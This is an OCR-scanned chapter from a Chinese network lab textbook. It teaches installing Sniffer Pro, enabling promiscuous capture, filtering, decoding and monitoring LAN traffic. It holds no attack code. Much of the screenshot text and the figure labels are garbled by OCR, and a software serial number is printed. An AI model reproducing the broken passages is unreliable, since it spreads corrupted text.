本 实验 采用 一 个 已 经 连接 并 配置 好 的 局 域 网 环境 。 在 PC 上 安装 Windows 操作 系统 。 
预备 知识 

(D TCP/IP 原理 及 基本 协议 。 

(2) 数据 交换 技术 的 概念 及 原理 。 

(3) 路 由 技术 及 实现 方式 。 

实验 步 又 


按照 常规 安装 方法 双击 Sniffer 软件 的 安装 图 标 按 顺序 进行 ,如 图 3.2. 1 所 示 。 本 书 选 
用 的 软件 版 本 为 Sniffer Portable 4.7.5。 


Welcome to the InstallShield Wizard 
for Sniffer Portable 4.7.5 


Wai wl hep eia Sr Portatile 
4.7.50n your computer. To continue, dick 


图 321 软件 安装 界面 


如 图 3. 3. 2 所 示 ,选择 Sniffer Pro 的 安装 目录 时 ,默认 安装 在 C:\Program Files\NAI\ 
SnifferNT 目录 中 ,为 了 更 好 地 使 用 ,建议 用 默认 路 径 进行 安装 。 


Setup will install Sriffer Pro in the following folder 

To install to this folder, click Next 

To install to a diferent folder, click Browse and select another 
folder 


You can choose not to install Sniffer Pro by clicking Cancel to 
ext Setup. 


p Destination Folder 


C:\Program Files\NAI\SrifferNT Browse, 


et [Fie] _ owen 


图 322 安装 目录 选择 界面 
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注册 用 户 时 ,需要 填写 必要 的 注册 信息 。 在 出 现 的 Sniffer Pro User Registration 的 3 
个 对 话 框 中 依次 填写 个 人 信息 。 如 图 3. 2. 3 所 示 ,最 后 一 行 的 Sniffer Serial Number 需要 
填 人 购买 软件 时 提供 的 注册 码 。 


* Please let us know where you [earrine sa 1 Il 
heard about this product, DA 


Do you wish to receive rm m 
announcements about this 
product? 


May we share your name with No - 


other companies that use NAI 
products? 


M" Sniffer Serial Number f 


Cro 取消 


图 323 用 户 注册 界面 


如 图 3. 2. 4 所 示 , 完 成 注册 操作 后 ,需要 设置 网 络 连 接 状 况 。 从 上 至 下 ,依次 有 3 个 选 
项 :“Direct Connection to the Internet( 直 接连 接 )”*Connection to the Internet through a 
Proxy( 通 过 代理 服务 器 连接 )”*Not connected to network or dial-up print & fax option( 拨 号 、 
传真 或 无 连接 )”。 一 般 情 况 下 ,用 户 选择 第 一 项 一 一 “Direct Connection to the Internet", 


If you are connecting to the Internet through 
dial-up networking, you may wish to connect nov. 

I£ you are connecting over a local area network, you 
may need to connect through proxy. Please consult 
your system administrator 


I£ you are unable to connect to the Internet, your 
registration information can be printed and saved. 


G Direct Connection to the Internet) 
C Connection to the Internet through a Proxy 


Configure 


C Wot connected to network or dial-up. 
Print & fax option. 


—m | 


图 324 网 络 连 接 状况 设置 界面 


如 图 3. 2. 5 所 示 , 若 通过 代理 服务 器 连接 , 则 需要 输入 代理 服务 器 地 址 ,用户 名 和 账号 
等 信息 。 

接 下 来 系统 会 自动 定位 并 连接 到 最 近 的 网 络 服务 器 Mercury. nai. com, 完 成 必要 的 注 
册 信 息 提交 和 注册 码 认证 工作 。 当 用 户 的 注册 信息 验证 通过 后 ,系统 会 转 和 人 如 图 3. 2. 6 所 
示 的 界面 ,用 户 被 告知 系统 分 配 的 身份 识别 码 ,以便 用 户 进行 后 续 的 服务 和 咨询 。 


如 图 3.2. 7 所 示 , 此 时 用 户 单 击 【 下 一 步 3 按 钮 ,系统 会 提示 用 户 保 存 关 键 性 的 注册 信 
息 , 并 生成 一 个 文本 格式 的 文件 Registration Summary. txt。 


to the Internet through 
may wish to connect now 
E PO eM 
Fe 一 HITP proxy at rough a proxy. Please consult 


onnect to the Internet, your 
on can be printed and saved. 


ternet through a Proxy 
Configure 


work or dial-up. 


Your user name and password will not 
be stored. 


Password: o the Internet) 
J 


<Ł-50[T-#0>] _ mä 


图 325 代理 服务 器 设置 界面 


回 Lecating nearest server 
回 Connecting to service 
Updating customer information 

EZ Communication with server complete 
FA Cleaning vp communications 


Status | 


istration complete! 
our customer identification number is 3168111. 
ease make a note of this value for future 

ference, 


图 326 注册 信息 验证 界面 
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legistration complete! 
ou customer identification nuaber is 3168111. | 
lease make a note of this value for future refe 


'entact Info Network Associate + 
OO? 
Cie] re. | 


T^ Display product information from the World Wid 


Finish Av 


327 注册 信息 保存 提示 


该 文件 主要 包括 以 下 几 个 重 


要 部 分 ,详细 内 容 可 参照 图 3. 2. 8。 


|User Registration Information 


Registration complete! 


Contact Info Network Associates 
| http: \\wwm. nai. com 
Phone # (408)988-3832 


Product Sniffer Pro 

[Customer ID 3168111 

| Name tmp tmp 

|Company temp 

Title test 

Mailing Address random 

| XXX, < Other > 000000 


[Phone Number 000. 000. 0000000000 
Fax Number 

Receive Announcements No 

Share Name No 


E-Mail Address xxx8163. com 
[System ID 3ADD4972-0C41-4746- 
B10D-5BCBDBF80D2A 


图 328 注册 文件 内 容 


。 用 户 身份 识别 码 (Customer Identification Number), 


。 服务 器 连接 信息 (Contact Info), 
。 用 户 填写 的 身份 注册 信息 (Product Sniffer Pro). 


|Your customer identification number is 3168111. 
[Please make a note of this value for future reference. 


|Sniffer Registration SA154-2558Y-255T9-2LASH 


由 于 Sniffer Pro 软件 的 运行 环境 需要 Java 环境 支撑 ,因此 ,在 软件 使 用 前 安装 程序 会 


提示 用 户 安装 并 设置 Java 环境 ,如 图 3. 2.9 所 示 。 


Javaltm] Runtime Environment 1.6.0 16 Standard Edition 


欢迎 使 用 Sun Microsystems, Inc. 的 Java[tm] 技术 | 


Q Sun. 


microsystems 


SUN MICROSYSTEMS, INC. 
二 进 制 代码 许可 协议 


© 我 同意 (A), 请 继续 运行 Sun Microsystems, Inc. 的 Java 技术 。 
| C 我 不 同意 (D), 请 停止 运行 Java 技术 。 


SEM STE Java 软件 。 在 使 用 之 前 , 你 必须 同意 以 下 的 许可 证 协议 。 


a 


[AVA SE RUNTIME ENVIRONMENT (JRE) VERSION 6 和 JAVAFX RUNTIME VERSION 
1 


SUN MICROSYSTEMS, INC. (“SUN”) 原意 授予 您 许可 证 ， 许 可 您 使 用 下 述 软件 ， 但 条 
件 是 您 必须 接受 本 二 进 制 代码 许可 协议 的 所 有 条 款 以 及 增补 许可 条 款 (统称 “协议 ") ~ 


图 329 设置 Jaa 环 境 
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接 下 来 ,系统 在 完成 关键 文件 复制 和 安装 的 工作 后 ,会 出 现 setup complete 提示 ,由 于 
Sniffer Pro 需要 将 网 卡 的 监听 模式 切换 为 混杂 ,所 以 需要 重新 启动 计算 机 完成 网 卡 的 工作 
模式 切换 , 当 软 件 提示 重新 启动 计算 机 时 ,按照 提示 操作 即 可 。 

重新 启动 计算 机 后 ,可 以 通过 运行 Sniffer Pro 监测 网 络 中 的 数据 包 。 通 过 【开始 -程序 - 
Sniffer pro-Sniffer] 启 动 程序 。 进 入 主 界面 后 ,首先 要 配置 监听 网 卡 。 一 般 情 况 下 ,Sniffer 
Pro 初次 运行 时 会 自动 选择 机 器 网 卡 进行 监听 。 如 果 本 地 计算 机 有 多 个 网 卡 , 则 需要 手工 
指定 。 具 体 方法 如 下 。 

CD 选择 软件 [文件 (file)JF 的 【 选 定 设置 (select settings) DÆM., 

(2) 在 【当前 设置 (settings)] 窗 口中 选择 监听 的 网 卡 , 同 时 色 选 Log Off , 单 击 【确定 ] 按 
钮 ,如 图 3. 2. 10 所 示 。 


Local PHEW... 
B) Realtek RTL8139 Family PCI 了 
RE 


ia] 
y F Exon 


TNI - 


ED re EU 
Lug fone 


[we e | 
图 3210 设置 提示 


(3) 如 果 存 在 多 个 网 卡 , 则 需要 确定 最 终 的 监听 网 卡 , 如 图 3. 2. 11 所 示 。 


Select Settings | 
Select settings for monitoring: 


Nev... | 
[ Realtek PCIe FE Family Controller_{ 


E \Device\Sniffer_{D9BC784B-CE81-43F1 Edit... | 


E \Device\Sniffer_{D1963F14-5F32-443; 
Delete... J 


; F Log off 


321 多 网 卡 设置 提示 


完成 上 述 操 作 后 ,就 可 以 使 用 Sniffer Pro 对 目标 机 器 进行 网 络 监听 了 ,如 图 3. 2. 12 所 
示 。 快 捷 操作 功能 主要 包括 报 文 捕获 及 网 络 性 能 监视 ,主要 监控 目标 机 器 的 网 络 流量 和 错 
误 数据 包 的 情况 。 主 要 的 参考 信息 包括 网 络 使 用 率 (utilization) ,数据 包 传 输 率 (packets/s) 、 
错误 数据 情况 Cerror/s) 。 
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ENTE E I 
ze s| 会 | 济公 | 要 | 总 | 全 | 区 | 2 S| «| 
到 到 到 天 


图 3212 快捷 操作 菜单 


实验 报告 要 求 


。 写 明 实 验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 
。 阐述 碰 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 


思考 题 


(1) 网 卡 的 工作 模式 有 几 种 ? 
(2) 描述 监听 模式 的 具体 工作 情况 。 


3.2.3 ”数据 包 捕获 实验 


实验 器 材 


Sniffer Pro 软件 系统 ,1 套 。 
PC(Windows XP/Windows 7).1 £. 


预习 要 求 


(1) 做 好 实验 预习 ,复习 网 络 协议 有 关 的 内 容 。 
(2) 熟悉 实验 过 程 和 基本 操作 流程 。 
(3) 做 好 预习 报告 。 


实验 任务 

通过 本 实验 ,熟练 掌握 Sniffer 数据 包 捕 获 功能 的 使 用 方法 。 

实验 环境 

本 实验 采用 一 个 已 经 连接 并 配置 好 的 局 域 网 环境 。 在 PC 上 安装 Windows 操作 系统 。 
预备 知识 


(1) 数据 交换 技术 的 概念 及 原理 。 
(2) 路 由 技术 及 实现 方式 。 


实验 步 又 


1. 报 文 捕获 
数据 包 捕捉 (capture) 是 将 所 有 的 数据 包 截取 并 放 在 磁盘 缓冲 区 中 ,便于 分 析 。 基 本 原 
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理 是 通过 软件 手段 设置 网 络 适配器 (NIC) 的 工作 模式 ,在 这 种 模式 下 ,网 卡 接收 所 有 的 数 
据 , 达 到 网 络 监控 和 网 络 管理 的 功能 。 

如 图 3. 2. 13 所 示 , 报 文 捕获 快捷 操作 的 功能 依次 为 开始 .暂停 .停止 .停止 显示 .显示 、 
定义 过 滤器 以 及 选择 过 滤器 。 一 般 情 况 下 ,选择 默认 的 捕获 条 件 。 

Sniffer 启动 后 ,一 般 处 于 脱 机 模式 。 在 捕获 报 文 前 ,需要 进入 记录 模式 ,通过 选择 【 文 
件 ] 菜 单 下 的 [记录 于 3 启动 网 卡 的 监听 模式 。 也 可 以 通过 【 选 定 设置 ] 勾 选 “*Log On/Off” 完 
成 上 述 操作 。 此 时 可 根据 需要 进行 局 域 网 的 回环 测试 。 选 择 【捕获 ] 衣 单 下 的 [开始 ] 或 直接 
单 击 捕获 快捷 菜单 中 的 [开始 3 按钮 ,系统 开始 进行 网 络 报 文 的 捕获 。 

在 捕获 过 程 中 , 单 击 快捷 菜单 中 的 【捕获 面板 了 或 选择 [捕获 了 莹 单 下 的 【捕获 面板 选项 ， 
可 以 随时 查看 捕获 报 文 的 数量 以 及 数据 缓冲 区 的 利用 率 , 如 图 3. 2. 14 Bros o 


r| u| ajaja s Br | 
图 3213 捕获 报 文 快 捷 操 作 菜 单 图 3214 报 文 捕获 面板 


左 侧 仪表 显示 了 系统 当前 捕获 到 的 报 文 数量 , 右 侧 仪表 显示 了 捕获 报 文 的 数据 缓冲 器 
大 小 。 此 外 ,还 可 以 选择 [细节 3 功能 ,查看 详细 的 统计 信息 ,如 图 3.2. 15 Bron 


|# 看 见 60030|# 已 接受 的 22003| 
| Drops. 0}# 1638 0 
PRAD 8 MB| 碎 片 大 少 全 部 
冲 器 动作 ee ikea 0:14:31 
保存 文件 # [n3 N| 
a 
| 节 


325 报 文 捕获 统计 信息 


捕获 到 的 报 文 存储 在 缓冲 器 内 。 使 用 者 可 以 显示 和 分 析 缓 冲 器 内 的 当前 报 文 , 也 可 以 
将 报 文保 存 到 磁盘 ,加载 和 显示 之 前 保存 的 报 文 信息 ,进行 离线 分 析 和 显示 。 

整个 捕获 过 程 受 [定义 过 滤器 ] 的 约束 ,选择 [捕获 ] 菜 单 下 的 [定义 过 滤器 】 单 击 【缓冲 】 
选项 卡 , 对 捕获 缓冲 区 进行 设置 。 

首先 ,缓冲 区 的 大 小 由 用 户 自 定义 ,根据 实际 主机 的 内 存 容 量 进行 调整 。 缓 冲 区 设置 过 
大 ,容易 造成 软件 运行 延迟 。 

其 次 ,数据 包 大 小 应 选择 适度 ,截取 部 分 数据 包 能 够 节省 磁盘 空间 ,保证 网 络 通 信 流 畅 ， 
避免 丢失 帧 。 

值得 一 提 的 是 , 当 禁 止 [保存 到 文件 3 选项 时 ,可 以 选择 停止 捕获 条 件 , 即 缓冲 区 已 满 或 
覆盖 原 有 数据 。 

此 外 ,也 可 以 通过 指定 文件 名 前 级 和 脱 机 文件 数 对 捕获 信息 进行 存储 ,如 图 3. 2. 16 
所 示 。 
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以 上 介绍 的 是 基本 捕获 方式 , 若 需 要 捕获 特定 主机 或 工作 站 的 数据 包 , 可 以 通过 选择 
【监视 器 ] 菜 单 中 的 【主机 列表 】 选 项 查看 工作 站 信息 ,并 单 击 单个 主机 进行 数据 包 捕 获 。 

2. 报 文 分 析 

为 了 有 效 地 进行 网 络 分 析 ,需要 借助 专家 分 析 系 统 。 首 先 ,应 根据 网 络 协议 环境 对 专家 
系统 进行 配置 。 选 择 [ 工 具 了 莱 单 中 的 【专家 选项 ,如 图 3. 2. 17 所 示 。 


Subnet Masks i 802.11 Options 
Objects l Protocols 


所 需 内 存 容量 


捕获 中 选择 专 
家 分 析 系统 


专家 分 析 系统 重用 
最 大 警报 数 


专家 系统 显示 
频率 


m | caw | aw | 
图 3217 专家 选项 设置 


专家 系统 的 配置 能 够 帮助 分 析 人 员 专 注 于 特定 问题 ,通过 排除 某 些 系统 层 数据 ,捕获 到 
网 络 分 析 所 需 的 特定 通信 和 量 。 同 时 ,根据 每 层 对 象 所 需 的 内 存 容量 ,创建 每 个 系统 层 的 最 大 
对 象 数 。 

。 在 设置 中 必 专 家 分 析 系 统 重用 选项 定义 了 当 内 存 不 足 时 专家 分 析 系 统 需要 进行 的 
操作 , 即 覆 盖 原 有 数据 创建 新 对 象 (选中 ) 或 停止 创建 对 象 ,对 已 有 数据 进行 分 析 ( 未 
选中 ) 。 
默认 情况 下 , 当 数据 包 捕获 开始 时 ,专家 分 析 系 统 就 开始 分 析 进 入 缓冲 区 的 数据 包 ， 
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并 在 窗口 中 实时 显示 ,用户 可 以 在 捕获 的 同时 分 析 网 络 对 象 .症状 ,并 做 出 诊断 。 用 
户 也 可 以 选择 禁用 实时 分 析 功能 (未 选中 ) 。 
。 指定 可 创建 的 最 大 警报 数 。 当 达到 最 大 警报 数 时 ,专家 系统 会 覆盖 最 早 最 低级 别 的 
警报 (选中 ) 或 者 停止 创建 警报 。 
。 专家 系统 显示 的 刷新 频率 ,以 及 专家 分 析 系 统 数据 分 析 到 摘要 显示 操作 之 间 的 延迟 。 
。 对 于 专家 系统 的 警报 阔 值 配置 ,可 以 通过 选择 【工具 ] 葬 单 下 的 【专家 选项 ] 获 得 , 单 
击 【Alarms】 设 置 项 。 
值得 注意 的 是 ,系统 默认 的 阔 值 都 是 经 过 精确 计算 的 ,可 保证 系统 进行 诊断 和 问题 检测 
需求 ,对 于 阔 值 的 修改 ,可 能 会 导致 系统 判断 失误 或 运行 错误 。 如 图 3. 2. 18 所 示 ,每 一 个 系 
统 层 都 存在 多 个 症状 诊断 的 警报 阔 值 信息 。 


图 3218 专家 分 析 系 统 阅 值 设置 


对 于 各 类 网 络 协议 ,用 户 可 以 进行 选择 性 的 监听 和 分 析 , 单 击 【Alarms】 右 侧 的 
【Protocols] 设 置 项 ,如 图 3. 2. 19 所 示 ,可 按照 系统 分 析 层 进行 协议 选择 。 


Subnet Masks | RIP Options 1 802.11 Options 
Objects | Alaras Protocols 


IEEEB02 11 


Token Ring Yes 
KX Yes Enable All 
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图 3219 指定 分 析 协 议 设置 1 
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此 外 , 当 网 络 使 用 了 不 规范 的 子 网 掩 码 时 ,可 以 通过 选择 【Subnet Masks] 设 置 项 进行 
更 改 。 

专家 分 析 系 统 还 为 用 户 提供 了 用 于 检测 路 由 故障 的 路 由 信息 协议 (RIP) 分 析 , 通 过 分 
析 捕 获 报 文 的 路 由 选择 协议 构建 路 由 表 并 显示 。 专 家 分 析 系 统 通 常会 发 现 网 络 上 的 默认 路 
由 器 ,同时 构建 一 条 通 向 网 关 的 默认 静态 路 由 。 如 果 选 择 使 用 RIP 分 析 方 式 , 则 需要 将 【对 
象 】 设 置 项 中 的 连接 层 和 应 用 层 定义 为 “分 析 ”, 如 图 3. 2. 20 所 示 。 


Objects 1 Alaras | Protocols 
Subnet Masks DENEN 802.11 Options 


hannan S ea one Eram - ee 单 击 添加 默 

网 络 路 由 器 认 路 由 器 
ES 设置 子 网 地 
aae] 址 和 掩 码 


Subnet [Source [IP SubnetAddess | 
自动 捕获 网 
络 中 的 子 网 
Emo | m 


图 3220 指定 分 析 协 议 设置 2 


在 专家 分 析 系 统 属性 设置 中 还 特别 设 定 了 用 于 无 线 网 络 分 析 的 选项 。 启 用 欺诈 AP 查 
找 的 选项 后 ,专家 系统 会 对 访问 主机 的 MAC 地 址 和 选项 中 已 存 地 址 进行 比较 ,一 旦 出 现 异 
常 ,就 会 生成 警报 。 

通过 [显示] 菜单 下 的 【显示 设置 ] 选 项 ,可 以 自 定义 要 显示 的 分 析 内 容 。 如 图 3. 2. 21 所 
示 , 显 示 设 置 对 话 框 中 主要 包括 如 下 几 个 方面 。 


ah AERA | 协议 颜色 | 协议 使 详 诉 | 解码 字体 | 


Peter 


图 3221 摘要 显示 设置 


。【 普 通 ] 设 置 可 以 显示 或 隐藏 “主机 列表 ”和 矩阵 “协议 分 布 “ 统 计数 据 ” 等 。 
“ 【摘要 显示 可 以 定义 具体 显示 的 专家 症状 .系统 层 等 内 容 。 
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。【 协 议 颜色 ] 可 以 改变 显示 协议 使 用 的 字体 颜色 。 

。【 协 议 使 详 诉 ] 可 以 设置 每 个 协议 的 详细 显示 设置 。 

。【 解 码 字体 可 以 更 改 “ 解 码 ” 显 示 中 文字 体 类 型 .颜色 和 大 小 。 
摘要 显示 选项 说 明 与 状态 标志 说 明 分 别 如 表 3. 2. 1 和 表 3. 2. 2 所 示 。 


表 3.2.1 摘要 显示 选项 说 明 


显示 选项 启用 功能 描述 

专家 系统 症状 为 每 个 帧 显示 发 现 的 上 一 个 症状 

全 部 层 显示 帧 中 包含 的 协议 层 ,每 个 协议 层 一 行 

网 络 地 址 显示 为 网 络 地 址 ,否则 为 硬件 地 址 

MAC 地 址 中 的 厂商 ID 在 MAC 地 址 的 开头 部 分 显示 供应 商 名 称 

网 络 地 址 的 名 称 解析 显示 网 络 地 址 的 名 称 ,而 不 是 数字 地 址 

地 址 簿 解析 名 称 如 果 工 作 站 在 地 址 德 中 已 命名 , 则 显示 其 名 称 ,而 不 是 地 址 

二 进 制 格式 显示 将 表示 为 两 个 窗口 ,以 显示 工作 站 之 间 的 通信 情况 
可 选择 区 域 

状态 当 数据 包 出 现 异 常 时 ,显示 异常 状态 表示 , 见 表 3. 2. 2 

绝对 时 间 显示 收 到 帧 的 时 间 

Delta 时 间 显示 当前 帧 和 上 一 帧 之 间 的 时 间 间 隔 

相对 时 间 显示 当前 帧 和 标记 帧 之 间 的 时 间 间 隔 

Len( 字 节 ) 显示 帧 的 长 度 

累计 的 字 节 显示 从 标记 帧 开始 ,到 当前 帧 的 所 有 帧 的 长 度 


表 3.2.2 状态 标志 说 明 


状态 标志 状态 描述 状态 标志 状态 描述 
M 数据 包 已 标记 WAR 数据 包 小 于 64B, 无 CRC 错误 
A 数据 包 是 端口 A 捕获 到 的 分 段 数据 包 小 于 64B, 有 CRC 错误 
B 数据 包 是 端口 B 捕获 到 的 超大 数据 包 大 于 1518B, 无 CRC 错误 
# 数据 包 存 在 症状 ,或 具体 诊断 内 容 冲突 数据 包 由 于 冲突 而 损坏 
触发 器 | 数据 包 是 一 个 数据 触发 器 对 齐 数据 包 长 度 不 是 8 的 整数 倍 
CRC 具有 CRC 错误 大 小 正常 的 数据 包 地 址 重复 在 环 中 有 地 址 冲突 
超 长 具有 CRC 错误 大 小 超 长 的 数据 包 Wiz dl 目的 主机 未 收 到 数据 包 


在 专家 分 析 系 统 的 解码 显示 窗口 中 可 以 通过 【显示 菜单 下 的 [查找 帧 ] 获 得 特定 帧 信 
A. [ERWIES 4 个 选项 。 
© 文本 , 即 搜索 包含 特定 文本 字符 信息 的 帧 。 
。 数据 , 即 搜索 包含 特定 数据 模式 的 帧 。 
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* 状态 ,允许 搜索 具有 特定 状态 标志 的 帧 。 

。 专家 系统 ,允许 搜索 与 特定 专家 系统 症状 或 诊断 关联 的 帧 。 

专家 分 析 系 统 能 够 对 缓冲 区 内 的 数据 包 进 行 综合 分 析 , 将 捕获 内 容 按 照 服务 、 应 用 、 连 
接 \ 工 作 站 、 路 由 、 子 网 等 类 别 进行 分 类 统计 ,并 对 存在 安全 隐患 和 问题 的 服务 或 连接 进行 分 
析 ,给 出 确切 的 结论 。 对 于 问题 内 容 , 将 注 明 其 所 属 层次 (layer)、 诊 断 方式 (diagnoses)、 基 
本 征兆 (symptoms) 和 目标 (objects) 。 

专家 分 析 平 台 可 以 对 网 络 流量 进行 实时 分 析 , 并 提供 客观 翔实 的 诊断 结果 ,主要 包括 
【专家 分 析 系 统 下 解码 系统 下 矩阵 下 主机 列表 下 协议 列表 以 及 【统计 分 析 系 统 】, 只 要 单 击 
【停止 并 显示 】 ,就 可 以 查看 具体 的 网 络 分 析 数 据 , 如 图 3. 2. 22 所 示 。 


mefa E 


系统 摘 
要 信息 


图 3222 报 文 捕获 显示 界面 


通过 专家 分 析 平 台 ,可 以 捕获 在 网 络 会 话 过 程 中 存在 的 各 类 潜在 问题 。 这 些 问 题 被 定 
义 为 症状 或 诊断 。 

o ERR: 网 络 会 话 情 况 超过 专家 设 定 阔 值 ,表示 网 络 存在 潜在 问题 。 

* 诊断 : 多 个 一 起 分 析 的 症状 、 复 发 率 较 高 的 特定 症状 ,对 于 诊断 ,必须 立即 检查 。 

。 专家 系统 分 类 信息 : 显示 网 络 各 个 分 析 层 ,其 层次 性 与 OSI 参考 模型 类 似 。 

。 专家 系统 摘要 信息 : 根据 “摘要 显示 ?” 设 定 的 各 层 显示 数据 。 

对 于 某 项 统计 分 析 , 可 以 通过 双击 方式 查看 对 应 记录 的 详细 统计 信息 ,如 图 3. 2. 23 所 
示 。 对 于 每 一 项 记录 ,都 可 以 通过 查看 帮助 的 方式 了 解 产 生 的 原因 。 

3. 解码 分 析 

单 击 专家 系统 下 方 的 [解码 3 按钮 ,就 可 以 对 具体 的 记录 进行 解码 分 析 , 如 图 3. 2. 24 
所 示 。 页 面 自 上 而 下 由 3 部 分 组 成 : 捕获 的 报 文 、 解 码 后 的 内 容 、 解 码 后 的 二 进 制 编码 
信息 。 

对 于 解码 分 析 人 员 来 说 ,只 有 充分 掌握 各 类 网 络 协议 ,才能 看 懂 解 析出 来 的 报 文 。 利 用 
软件 解码 分 析 解 决 问题 的 关键 是 要 对 各 种 层次 的 协议 有 充分 的 了 解 。 
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图 3228 报 文 详细 信息 


[-]snit3: W, 1/4733 以 太 网 由 


P: Source port = 443 (Https) 
Destination port - 2015 
Sequence number = 2748361914 
Next expected Seq nunber= 2748363362 
Acknowledgment number -~ 4166104301 
Data offset = 20 bytes 
Reserved Bits: Reserved for Future Use (Not showa in the Hex Dump) 
Flegs = 10 
No urgent pointer) 
Acknowledgaent 
(No push) 
(No reset) 
(No SYN) 
(No FIN) 
Window 6432 
Checksun 5B40 (correct) 
Urgent pointer o 
No TCP options 
[1448 Bytes of data] 


DU000000: 00 16 76 7d le 31 00 Df eZ Sf 3c 8c 03 00 45 00 
00000010: 05 d0 fa 3a 40 00 2f 06 ee bd 7c 73 03 32 de 1b 
00000020; fe ae 


El 3220 报 文 解码 


4. 统计 分 析 

对 于 各 种 报 文 信息 ,专家 系统 提供 了 矩阵 分 析 ( 见 图 3. 2. 25) .主机 列表 分 析 ( 见 图 3. 2. 26)、 
协议 统计 分 析 ( 见 图 3. 2. 27) 以 及 会 话 统计 分 析 ( 见 图 3. 2. 28) 等 多 种 统计 分 析 功 能 ,可 以 按 
RR MAC 地 址 ,IP 地 址 ,协议 类 型 等 内 容 进 行 多 种 组 合 分 析 。 

5. 捕获 条 件 设置 

在 Sniffer 环境 下 ,可 以 通过 【定义 3 的 方式 对 捕获 条 件 进行 设置 ,获得 用 户 需 要 的 报 文 
协议 信息 。 基 本 的 捕获 条 件 有 两 种 。 
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图 3225 EA 
9 MIO) i5] 2] 
AMEN | SFB | 出境 数据 包 | HSH | 数据 包 总 数 | oot 
v 4 1209 5 320 9 1529 
000FE25F3C8C |6 402 6 1413 12 1815 
本 地 2 204 1 82 3 286 


图 3226 主机 列表 分 析 


E 
量 
始 捕获 次 数 2010-06-21 08:27 
获 持 续 时 间 0,00:01.934 
节 总 数 1815 
EEA 12 
[E308 E A 151 
庄 节 每 秒 9338 
除 据 包 每 秒 6 
PESHA 0* 


100 Mbps 


P 多 点 传送 数据 包 |0 


EESAN 3 

[TCF 字 节 1529 
3 

286 
0 
0 
| |. lS æl 0 
协议 “| 数据 包 | 字 节 0 
HTTPS |3 9 0 
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图 3227 协议 统计 分 析 图 3228 会 话 统计 分 析 


CD 链 路 层 捕 获 : 按照 源 MAC 地 址 和 目的 MAC 地 址 设 定 捕获 条 件 ,输入 方式 为 十 六 
进 制 MAC 地 址 ,如 000D98ABCDFE。 


(2) IP 层 捕获 : 按 源 IP 地 址 和 目的 IP 地 址 设 定 捕 获 条 件 。 输 入 方式 为 DP 地 址 ,如 
192. 168. 1. 157。 特 别 注意 的 是 ,如 果 选 择 IP 层 捕获 方式 , 则 ARP 等 类 型 报 文 信息 将 被 过 
滤 掉 。 

用 户 可 以 通过 单 击 快捷 面板 上 的 国 按 钮 ,或 选择 [捕获 ] 荣 单 下 的 【定义 过 滤器 3 设 定 捕 
获 条 件 , 如 图 3. 2. 29 所 示 。 


器 
缓冲 器 大 小 : 8 Meg FP 
组 种 器 动作 TER (trap) 


取消 | 配置 文件 
A320 过 滤器 操作 界面 
过 滤器 主要 包括 [摘要 下 地 址 下 数据 模式 下 高 级 下 缓冲 】5 个 选项 界面 。 
。【 摘 要 】 选 项 界面 显示 了 当前 缓冲 器 的 设 定 情况 。 
*。【 地 址 了 选项 界面 用 来 进行 缓冲 器 捕获 条 件 的 设 定 ,如 图 3. 2.30 所 示 。 


Hb Me (2 ff) 
—Ó 地 址 NN lee | 为 设置 
已 知 的 地 址 : Dragable W Bü 


捕获 条 件 mr 


[模式 人 
6 &&m 001556366375 (本 地 ) 
C HOD Quim 


数据 流向 


取消 — | 配置 文件 
图 3230 捕获 条 件 定义 界面 


。【 数 据 模式 ] 选 项 界面 用 来 编辑 捕获 条 件 。 
。【 高 级 选项 界面 用 来 设 定 捕获 的 协议 .数据 包 类 型 .数据 包 大 小 等 信息 。 
。【 缓 冲 ] 选 项 界面 用 来 对 缓冲 区 进行 详细 配置 。 
在 【高 级 页 面 下 ,可 以 更 加 详细 地 配置 捕获 条 件 , 可 以 选择 需要 捕获 的 协议 条 件 .数据 
包 具 体 长 度 , 数 据 包 类 型 等 。 在 保存 过 滤 规 则 条 件 [ 配 置 文件 (Profiles)JF ,可 以 将 当前 设 
置 的 过 滤 规 则 进行 保存 。 在 捕获 面板 中 ,可 以 选择 保存 的 捕获 条 件 | 硬是 是 呈 时 二 | . 
。78 。 


在 【数据 模式 了 页 面 下 ,可 以 编辑 更 加 详细 的 捕获 条 件 , 如 图 3.2. 31 所 示 。 利 用 数据 模 
式 的 方式 可 以 实现 复杂 报 文 过 滤 , 但 同时 增加 了 捕获 的 时 间 复 杂 度 。 


定义 过 小 器 -捕获 
mm | 地 址 。 数据 模式 m ee | 


模板 关系 控制 一 | 
添加 关系 节点 now | enmon | see cr | Er 定义 过 滤 条 件 
增加 模式 (4) CE HRS REW 
xm | 配置 文件 ， 
图 3231 捕获 条 件 详细 配置 界面 
实验 报告 要 求 


。 写 明 实验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 
。 阅 述 碰 到 的 问题 以 及 解决 方法 。 
OB SA. 


3.2.4 网 络 监视 实验 

实验 器 材 

Sniffer Pro 软件 系统 ,1 套 。 

PC( Windows XP/Windows 7).1 fi. 
预习 要 求 


(1) 做 好 实验 预习 ,复习 网 络 协议 的 有 关内 容 。 
(2) 复习 Sniffer 软件 数据 捕获 功能 的 操作 方法 。 
(3) 熟悉 实验 过 程 和 基本 操作 流程 。 

(4) 做 好 预习 报告 。 


实验 任务 


通过 本 实验 ,掌握 以 下 技能 。 
(1) 熟练 掌握 Sniffer 的 各 项 网 络 监视 模块 的 使 用 。 
(2) 能 够 熟练 运用 网 络 监视 功能 撰写 网 络 动态 运行 报告 。 


。79 。 


实验 环境 
本 实验 采用 一 个 已 经 连接 并 配置 好 的 局 域 网 环境 ,在 PC 上 安装 Windows 操作 系统 。 
预备 知识 


(D TCP/IP 原理 及 基本 协议 。 
(2) 数据 交换 技术 的 概念 及 原理 。 
(3) 路 由 技术 及 实现 方式 。 


实验 步 又 


单 击 【 监 视 器 ] 菜 单 或 快捷 操作 界面 .可 依次 看 到 如 下 监视 功能 :【 仪 表 板 】【 主 机 列 
表 】【 和 窍 阵 ]【 请 求 响应 时 间 】 【历史 取样 ]【 协 议 分 析 】【 全 局 统计 表 】【 警 报 日 志 ]】 等 。 

1. 仪表 板 

单 击 快捷 操作 菜单 上 的 图 标 人 到 , 即 可 弹出 仪表 板 。 在 仪表 板 上 方 可 对 监视 行为 进行 具 
体 配置 ,并 对 监视 内 容 进行 重 置 。 如 图 3. 2. 32 所 示 ,网 络 监 视 仪表 板 包括 3 个 仪表 。 


A322 网 络 监视 仪表 板 


